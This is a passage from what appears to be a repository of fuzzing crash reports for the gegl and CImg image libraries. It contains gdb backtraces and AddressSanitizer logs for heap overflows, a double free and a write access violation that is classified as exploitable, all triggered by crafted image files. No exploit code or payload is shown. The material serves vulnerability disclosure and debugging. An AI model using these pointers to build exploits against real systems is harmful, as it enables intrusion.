(operation=0x6cc460, context=, 108 | output_prop=, result=0x740450, level=0) 109 | at ../../../gegl/gegl/operation/gegl-operation-source.c:182 110 | #5 0x00007ffff7b6b0ae in gegl_graph_process (path=0x747160, level=level@entry=0) 111 | at ../../../gegl/gegl/process/gegl-graph-traversal.c:469 112 | #6 0x00007ffff7b67fe8 in gegl_eval_manager_apply (self=0x73ff80, roi=roi@entry=0x746d40, 113 | level=level@entry=0) at ../../../gegl/gegl/process/gegl-eval-manager.c:128 114 | #7 0x00007ffff7b51f7e in gegl_node_apply_roi (level=0, roi=0x746d40, self=0x696050) 115 | at ../../../gegl/gegl/graph/gegl-node.c:1081 116 | #8 gegl_node_blit (self=0x696050, scale=1, roi=roi@entry=0x746d40, format=format@entry=0x63cb20, 117 | destination_buf=destination_buf@entry=0x7ffff7ee9010, rowstride=24, rowstride@entry=0, 118 | flags=flags@entry=GEGL_BLIT_DEFAULT) at 
../../../gegl/gegl/graph/gegl-node.c:1161 119 | #9 0x00007ffff7b6f928 in render_rectangle (processor=0x735460) 120 | at ../../../gegl/gegl/process/gegl-processor.c:518 121 | #10 gegl_processor_render (progress=0x0, rectangle=0x735488, processor=0x735460) 122 | at ../../../gegl/gegl/process/gegl-processor.c:662 123 | #11 gegl_processor_work (processor=processor@entry=0x735460, progress=progress@entry=0x0) 124 | at ../../../gegl/gegl/process/gegl-processor.c:796 125 | #12 0x00007ffff7b50a5a in gegl_node_process (self=) 126 | at ../../../gegl/gegl/graph/gegl-node.c:1827 127 | #13 0x00000000004039ea in main (argc=, argv=) 128 | at ../../gegl/bin/gegl.c:255 129 | ``` 130 | 131 | ## 4. gegl-outbound-write-2 132 | 133 | ``` 134 | $ gdb --args gegl $POC 135 | [Thread debugging using libthread_db enabled] 136 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 137 | 138 | (gegl:201): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 139 | 140 | (gegl:201): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 141 | LIBPNG ERROR: PNG unsigned integer out of range.libpng error: PNG unsigned integer out of range. 142 | LIBPNG ERROR: PNG unsigned integer out of range.libpng error: PNG unsigned integer out of range. 143 | 144 | ** (gegl:201): WARNING **: No display handler operation found for gegl:display 145 | LIBPNG ERROR: PNG unsigned integer out of range.libpng error: PNG unsigned integer out of range. 146 | [New Thread 0x7fffef432700 (LWP 202)] 147 | 148 | Thread 1 "gegl" received signal SIGSEGV, Segmentation fault. 
149 | babl_format_get_bytes_per_pixel (format=0x824871a0) at babl-format.c:538 150 | 538 if (format->class_type == BABL_FORMAT) 151 | $ bt 152 | #0 babl_format_get_bytes_per_pixel (format=0x824871a0) at babl-format.c:538 153 | #1 0x00007ffff7b06ad5 in constructed (object=) at ../../../gegl/gegl/buffer/gegl-tile-backend.c:128 154 | #2 0x00007ffff7b0f37b in gegl_tile_backend_swap_constructed (object=0x7355c0) at ../../../gegl/gegl/buffer/gegl-tile-backend-swap.c:825 155 | #3 0x00007ffff77b1897 in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 156 | #4 0x00007ffff77b31b5 in g_object_new_valist () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 157 | #5 0x00007ffff77b3521 in g_object_new () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 158 | #6 0x00007ffff7a819a1 in gegl_buffer_constructor (type=, n_params=16, params=) at ../../../gegl/gegl/buffer/gegl-buffer.c:578 159 | #7 0x00007ffff77b1149 in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 160 | #8 0x00007ffff77b31b5 in g_object_new_valist () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 161 | #9 0x00007ffff77b3521 in g_object_new () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 162 | #10 0x00007ffff7b5114f in gegl_node_get_cache (node=) at ../../../gegl/gegl/graph/gegl-node.c:2015 163 | #11 0x00007ffff7b6e471 in gegl_processor_set_rectangle (processor=0x735460, rectangle=) at ../../../gegl/gegl/process/gegl-processor.c:366 164 | #12 0x00007ffff77b170d in ?? 
() from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 165 | #13 0x00007ffff77b31b5 in g_object_new_valist () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 166 | #14 0x00007ffff77b3521 in g_object_new () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 167 | #15 0x00007ffff7b732dc in gegl_node_new_processor (node=, rectangle=) at ../../../gegl/gegl/process/gegl-processor.c:829 168 | #16 0x00007ffff7b50a4a in gegl_node_process (self=0x6962c0) at ../../../gegl/gegl/graph/gegl-node.c:1825 169 | #17 0x00000000004039ea in main (argc=, argv=) at ../../gegl/bin/gegl.c:255 170 | Description: Access violation on destination operand 171 | Short description: DestAv (8/22) 172 | Hash: 2de8b3adb00a42a787c6c00f820ea8be.4b5b031fbd08ebbe2eb2f77fcda9adc2 173 | Exploitability Classification: EXPLOITABLE 174 | Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. 175 | Other tags: AccessViolation (21/22) 176 | 177 | ``` 178 | 179 | ## 5. gegl-dos-3 180 | 181 | ``` 182 | Starting program: /src/aflbuild/installed/bin/gegl /work/crashes/'gegl000:id:000000,sig:11,src:000069,op:havoc,rep:2' 183 | [Thread debugging using libthread_db enabled] 184 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 185 | 186 | (gegl:155): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 187 | 188 | (gegl:155): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 189 | 190 | Program received signal SIGSEGV, Segmentation fault. 191 | 0x00007ffff091bb94 in ?? () from /usr/lib/x86_64-linux-gnu/libjpeg.so.8 192 | (gdb) bt 193 | #0 0x00007ffff091bb94 in ?? () from /usr/lib/x86_64-linux-gnu/libjpeg.so.8 194 | #1 0x00007ffff091c4df in ?? () from /usr/lib/x86_64-linux-gnu/libjpeg.so.8 195 | #2 0x00007ffff091a8ed in ?? 
() from /usr/lib/x86_64-linux-gnu/libjpeg.so.8 196 | #3 0x00007ffff0913bc7 in jpeg_consume_input () from /usr/lib/x86_64-linux-gnu/libjpeg.so.8 197 | #4 0x00007ffff0913ea3 in jpeg_read_header () from /usr/lib/x86_64-linux-gnu/libjpeg.so.8 198 | #5 0x00007fffef63d223 in gegl_jpg_load_query_jpg (stream=stream@entry=0x748890, width=width@entry=0x7fffffffd670, height=height@entry=0x7fffffffd674, out_format=out_format@entry=0x7fffffffd678) 199 | at ../../../gegl/operations/external/jpg-load.c:188 200 | #6 0x00007fffef63d7f4 in gegl_jpg_load_get_bounding_box (operation=operation@entry=0x6cc260) at ../../../gegl/operations/external/jpg-load.c:302 201 | #7 0x00007ffff7b244f6 in gegl_operation_get_bounding_box (self=self@entry=0x6cc260) at ../../../gegl/gegl/operation/gegl-operation.c:197 202 | #8 0x00007ffff7b6909f in gegl_graph_prepare (path=0x73c880) at ../../../gegl/gegl/process/gegl-graph-traversal.c:191 203 | #9 0x00007ffff7b67955 in gegl_eval_manager_prepare (self=0x740080) at ../../../gegl/gegl/process/gegl-eval-manager.c:93 204 | #10 0x00007ffff7b67a01 in gegl_eval_manager_get_bounding_box (self=self@entry=0x740080) at ../../../gegl/gegl/process/gegl-eval-manager.c:102 205 | #11 0x00007ffff7b50357 in gegl_node_get_bounding_box (self=self@entry=0x696530) at ../../../gegl/gegl/graph/gegl-node.c:1810 206 | #12 0x00007ffff7b52851 in gegl_node_property_changed (gobject=, arg1=0x727360, user_data=0x696530) at ../../../gegl/gegl/graph/gegl-node.c:1352 207 | #13 0x00007ffff77abfa5 in g_closure_invoke () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 208 | #14 0x00007ffff77bdfc1 in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 209 | #15 0x00007ffff77c6d5c in g_signal_emit_valist () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 210 | #16 0x00007ffff77c708f in g_signal_emit () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 211 | #17 0x00007ffff77b04d4 in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 212 | #18 0x00007ffff77afd88 in ?? 
() from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 213 | #19 0x00007ffff77b2b0b in g_object_thaw_notify () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 214 | #20 0x00007ffff7b5b206 in gegl_node_set_valist (self=self@entry=0x696530, first_property_name=, first_property_name@entry=0x7ffff20e505d "path", var_args=var_args@entry=0x7fffffffde20) 215 | at ../../../gegl/gegl/graph/gegl-node.c:1546 216 | #21 0x00007ffff7b5bc04 in gegl_node_set (self=0x696530, first_property_name=first_property_name@entry=0x7ffff20e505d "path") at ../../../gegl/gegl/graph/gegl-node.c:1442 217 | #22 0x00007ffff20d6e35 in do_setup (operation=operation@entry=0x64c500, path=0x73ba20 "/work/crashes/gegl000:id:000000,sig:11,src:000069,op:havoc,rep:2", uri=0x739770 "") 218 | at ../../../gegl/operations/core/load.c:262 219 | #23 0x00007ffff20d7fac in my_set_property (gobject=, property_id=1, value=0x7fffffffe000, pspec=0x7351b0) at ../../../gegl/operations/core/load.c:345 220 | #24 0x00007ffff77b42eb in g_object_set_property () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 221 | #25 0x00007ffff7b5b0cc in gegl_node_set_valist (self=self@entry=0x696390, first_property_name=, first_property_name@entry=0x73cce0 "path", var_args=var_args@entry=0x7fffffffe120) 222 | at ../../../gegl/gegl/graph/gegl-node.c:1537 223 | #26 0x00007ffff7b5bc04 in gegl_node_set (self=self@entry=0x696390, first_property_name=first_property_name@entry=0x73cce0 "path") at ../../../gegl/gegl/graph/gegl-node.c:1442 224 | #27 0x00007ffff7a6377e in param_set (pd=, new=0x696390, param_name=, param_value=0x73cc90 "gegl000:id:000000,sig:11,src:000069,op:havoc,rep:2") at ../../gegl/gegl/gegl-xml.c:145 225 | #28 0x00007ffff7a65fa7 in start_element (context=, element_name=, attribute_names=, attribute_values=, user_data=0x7fffffffe3e0, 226 | error=0x7fffffffe300) at ../../gegl/gegl/gegl-xml.c:420 227 | #29 0x00007ffff74d85a3 in ?? 
() from /lib/x86_64-linux-gnu/libglib-2.0.so.0 228 | #30 0x00007ffff74d9763 in g_markup_parse_context_parse () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 229 | #31 0x00007ffff7a6f744 in gegl_node_new_from_xml (xmldata=0x684a20 "", path_root=path_root@entry=0x64ad80 "/work/crashes") 230 | at ../../gegl/gegl/gegl-xml.c:576 231 | #32 0x0000000000403060 in main (argc=, argv=) at ../../gegl/bin/gegl.c:216 232 | ``` 233 | 234 | 235 | -------------------------------------------------------------------------------- /cimg/readme.md: -------------------------------------------------------------------------------- 1 | cimg crashes 2 | ================ 3 | 4 | code: 5 | http://cimg.eu/ 6 | https://github.com/dtschump/CImg 7 | 8 | ## 1. cimg-heap-overflow-1 9 | 10 | $cimgload cimg-heap-overflow-1 11 | 12 | ``` 13 | ================================================================= 14 | ==6193==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f91792ff800 at pc 0x00000049dd13 bp 0x7ffee7a8e890 sp 0x7ffee7a8e880 15 | READ of size 1 at 0x7f91792ff800 thread T0 16 | #0 0x49dd12 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48457 17 | #1 0x4b84a4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 18 | #2 0x4b84a4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 19 | #3 0x4022fa in cimg_library::CImg::assign(char const*) ../CImg.h:11514 20 | #4 0x4022fa in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 21 | #5 0x4022fa in main /src/CImg/fuzz-test/bmp-test.cpp:25 22 | #6 0x7f917bb8f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 23 | 24 | 0x7f91792ff800 is located 0 bytes to the right of 6287360-byte region [0x7f9178d00800,0x7f91792ff800) 25 | allocated by thread T0 here: 26 | #0 0x7f917ca906b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) 27 | #1 0x433fb6 in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int) ../CImg.h:11379 28 | #2 0x49a75d in 
cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int, unsigned char const&) ../CImg.h:11399 29 | #3 0x49a75d in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48348 30 | #4 0x4b84a4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 31 | #5 0x4b84a4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 32 | #6 0x4022fa in cimg_library::CImg::assign(char const*) ../CImg.h:11514 33 | #7 0x4022fa in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 34 | #8 0x4022fa in main /src/CImg/fuzz-test/bmp-test.cpp:25 35 | 36 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../CImg.h:48457 cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) 37 | Shadow bytes around the buggy address: 38 | 0x0ff2af257eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 | 0x0ff2af257ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 | 0x0ff2af257ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 | 0x0ff2af257ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 | 0x0ff2af257ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 | =>0x0ff2af257f00:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 44 | 0x0ff2af257f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 45 | 0x0ff2af257f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 46 | 0x0ff2af257f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 47 | 0x0ff2af257f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 48 | 0x0ff2af257f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 49 | Shadow byte legend (one shadow byte represents 8 application bytes): 50 | Addressable: 00 51 | Partially addressable: 01 02 03 04 05 06 07 52 | Heap left redzone: fa 53 | Heap right redzone: fb 54 | Freed heap region: fd 55 | Stack left redzone: f1 56 | Stack mid redzone: f2 57 | Stack right redzone: f3 58 | Stack partial redzone: f4 59 | Stack after return: f5 60 | Stack use after scope: f8 61 | Global redzone: f9 62 | Global init order: f6 63 | Poisoned by user: f7 64 | Container 
overflow: fc 65 | Array cookie: ac 66 | Intra object redzone: bb 67 | ASan internal: fe 68 | ==6193==ABORTING 69 | ``` 70 | 71 | 72 | ## 2. cimg-double-free-1 73 | 74 | ``` 75 | ================================================================= 76 | ==6191==ERROR: AddressSanitizer: attempting double-free on 0x62100001a500 in thread T0: 77 | #0 0x7f1be4f702ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) 78 | #1 0x7f1be40cbc55 in _IO_default_finish (/lib/x86_64-linux-gnu/libc.so.6+0x7bc55) 79 | #2 0x7f1be40bd29e in fclose (/lib/x86_64-linux-gnu/libc.so.6+0x6d29e) 80 | #3 0x7f1be4f6f7cd in fclose (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x977cd) 81 | #4 0x40a518 in cimg_library::cimg::fclose(_IO_FILE*) ../CImg.h:6187 82 | #5 0x49b051 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48467 83 | #6 0x4b84a4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 84 | #7 0x4b84a4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 85 | #8 0x4022fa in cimg_library::CImg::assign(char const*) ../CImg.h:11514 86 | #9 0x4022fa in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 87 | #10 0x4022fa in main /src/CImg/fuzz-test/bmp-test.cpp:25 88 | #11 0x7f1be407082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 89 | 90 | 0x62100001a500 is located 0 bytes inside of 4096-byte region [0x62100001a500,0x62100001b500) 91 | freed by thread T0 here: 92 | #0 0x7f1be4f702ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) 93 | #1 0x7f1be40cbe3c in _IO_default_finish (/lib/x86_64-linux-gnu/libc.so.6+0x7be3c) 94 | 95 | previously allocated by thread T0 here: 96 | #0 0x7f1be4f70602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) 97 | #1 0x7f1be40bd1d4 in _IO_file_doallocate (/lib/x86_64-linux-gnu/libc.so.6+0x6d1d4) 98 | 99 | SUMMARY: AddressSanitizer: double-free ??:0 __interceptor_free 100 | ==6191==ABORTING 101 | 102 | 103 | ``` 104 | 105 | ## 3. 
cimg-crash-1 106 | 107 | Segmentation fault caused by a failed allocation (the ASan allocator aborts the process instead of returning NULL). 108 | 109 | ``` 110 | ==6194==WARNING: AddressSanitizer failed to allocate 0x001800000c00 bytes 111 | ==6194==AddressSanitizer's allocator is terminating the process instead of returning 0 112 | ==6194==If you don't like this behavior set allocator_may_return_null=1 113 | ==6194==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0) 114 | #0 0x7f88deb49631 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa0631) 115 | #1 0x7f88deb4e5e3 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa55e3) 116 | #2 0x7f88deac6425 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x1d425) 117 | #3 0x7f88deb4c865 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa3865) 118 | #4 0x7f88deacbb4d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22b4d) 119 | #5 0x7f88deb4267e in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9967e) 120 | #6 0x433fb6 in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int) ../CImg.h:11379 121 | #7 0x49a9d5 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48366 122 | #8 0x4b84a4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 123 | #9 0x4b84a4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 124 | #10 0x4022fa in cimg_library::CImg::assign(char const*) ../CImg.h:11514 125 | #11 0x4022fa in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 126 | #12 0x4022fa in main /src/CImg/fuzz-test/bmp-test.cpp:25 127 | #13 0x7f88ddc4182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 128 | 129 | 130 | ``` 131 | 132 | ## 4. cimg-load_bmp-dos-1 133 | 134 | Loading the crafted BMP file with CImg.h leads to CPU exhaustion. 135 | 136 | 137 | ## 5. cimg-heap-overflow-load_bmp-48397 138 | 139 | A heap overflow occurs at line 48397 of CImg.h when loading the crafted BMP file. 
140 | The tested code commit is 8447076ef22322a14a0ce130837e44c5ba8095f4. 141 | 142 | ``` 143 | ================================================================= 144 | ==4030==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000ef9c at pc 0x000000494724 bp 0x7ffc58d04270 sp 0x7ffc58d04260 145 | READ of size 1 at 0x60600000ef9c thread T0 146 | #0 0x494723 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48397 147 | #1 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 148 | #2 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 149 | #3 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 150 | #4 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 151 | #5 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 152 | #6 0x7ff32e56282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 153 | #7 0x4022f8 in _start (/src/CImg/fuzz-test/bmp-test+0x4022f8) 154 | 155 | 0x60600000ef9c is located 0 bytes to the right of 60-byte region [0x60600000ef60,0x60600000ef9c) 156 | allocated by thread T0 here: 157 | #0 0x7ff32f15a6b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) 158 | #1 0x40562f in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int) ../CImg.h:11379 159 | #2 0x4907f4 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48342 160 | #3 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 161 | #4 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 162 | #5 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 163 | #6 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 164 | #7 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 165 | 166 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../CImg.h:48397 cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) 167 | Shadow bytes around the buggy address: 168 | 0x0c0c7fff9da0: fa 
fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 169 | 0x0c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 170 | 0x0c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 171 | 0x0c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 172 | 0x0c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00 173 | =>0x0c0c7fff9df0: 00 00 00[04]fa fa fa fa 00 00 00 00 00 00 06 fa 174 | 0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 175 | 0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 176 | 0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 177 | 0x0c0c7fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 178 | 0x0c0c7fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 179 | Shadow byte legend (one shadow byte represents 8 application bytes): 180 | Addressable: 00 181 | Partially addressable: 01 02 03 04 05 06 07 182 | Heap left redzone: fa 183 | Heap right redzone: fb 184 | Freed heap region: fd 185 | Stack left redzone: f1 186 | Stack mid redzone: f2 187 | Stack right redzone: f3 188 | Stack partial redzone: f4 189 | Stack after return: f5 190 | Stack use after scope: f8 191 | Global redzone: f9 192 | Global init order: f6 193 | Poisoned by user: f7 194 | Container overflow: fc 195 | Array cookie: ac 196 | Intra object redzone: bb 197 | ASan internal: fe 198 | ==4030==ABORTING 199 | 200 | ``` 201 | 202 | ## 6. cimg-heap-overflow-load_bmp-48413 203 | 204 | A heap overflow occurs in line 48413 in CImg.h when loading the crafted bmp file . 205 | the tested code commit is 8447076ef22322a14a0ce130837e44c5ba8095f4. 
206 | 207 | ``` 208 | ================================================================= 209 | ==4037==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000f034 at pc 0x000000493848 bp 0x7ffd46b9bc90 sp 0x7ffd46b9bc80 210 | READ of size 1 at 0x60200000f034 thread T0 211 | #0 0x493847 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48413 212 | #1 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 213 | #2 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 214 | #3 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 215 | #4 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 216 | #5 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 217 | #6 0x7f0ca927b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 218 | #7 0x4022f8 in _start (/src/CImg/fuzz-test/bmp-test+0x4022f8) 219 | 220 | AddressSanitizer can not describe address in more detail (wild memory access suspected). 221 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../CImg.h:48413 cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) 222 | Shadow bytes around the buggy address: 223 | 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 224 | 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 225 | 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 226 | 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 227 | 0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa 00 fa fa fa 00 00 228 | =>0x0c047fff9e00: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa 229 | 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 230 | 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 231 | 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 232 | 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 233 | 0x0c047fff9e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 234 | Shadow byte legend (one shadow byte represents 8 
application bytes): 235 | Addressable: 00 236 | Partially addressable: 01 02 03 04 05 06 07 237 | Heap left redzone: fa 238 | Heap right redzone: fb 239 | Freed heap region: fd 240 | Stack left redzone: f1 241 | Stack mid redzone: f2 242 | Stack right redzone: f3 243 | Stack partial redzone: f4 244 | Stack after return: f5 245 | Stack use after scope: f8 246 | Global redzone: f9 247 | Global init order: f6 248 | Poisoned by user: f7 249 | Container overflow: fc 250 | Array cookie: ac 251 | Intra object redzone: bb 252 | ASan internal: fe 253 | ==4037==ABORTING 254 | 255 | 256 | ``` 257 | 258 | ## 6. cimg-heap-overflow-load_bmp-48457 259 | 260 | A heap overflow occurs in line 48457 in CImg.h when loading the crafted bmp file . 261 | the tested code commit is 8447076ef22322a14a0ce130837e44c5ba8095f4. 262 | ``` 263 | ================================================================= 264 | ==4040==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62600000ed3c at pc 0x0000004941b2 bp 0x7ffe59105df0 sp 0x7ffe59105de0 265 | READ of size 1 at 0x62600000ed3c thread T0 266 | #0 0x4941b1 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48457 267 | #1 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 268 | #2 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 269 | #3 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 270 | #4 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 271 | #5 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 272 | #6 0x7f3fdcc1982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 273 | #7 0x4022f8 in _start (/src/CImg/fuzz-test/bmp-test+0x4022f8) 274 | 275 | 0x62600000ed3c is located 0 bytes to the right of 11324-byte region [0x62600000c100,0x62600000ed3c) 276 | allocated by thread T0 here: 277 | #0 0x7f3fdd8116b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) 278 | #1 0x4074fe in 
cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int) ../CImg.h:11379 279 | #2 0x49090a in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int, unsigned char const&) ../CImg.h:11399 280 | #3 0x49090a in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48348 281 | #4 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 282 | #5 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 283 | #6 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 284 | #7 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 285 | #8 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 286 | 287 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../CImg.h:48457 cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) 288 | Shadow bytes around the buggy address: 289 | 0x0c4c7fff9d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 290 | 0x0c4c7fff9d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 291 | 0x0c4c7fff9d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 292 | 0x0c4c7fff9d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 293 | 0x0c4c7fff9d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 294 | =>0x0c4c7fff9da0: 00 00 00 00 00 00 00[04]fa fa fa fa fa fa fa fa 295 | 0x0c4c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 296 | 0x0c4c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 297 | 0x0c4c7fff9dd0: fa fa fa fa 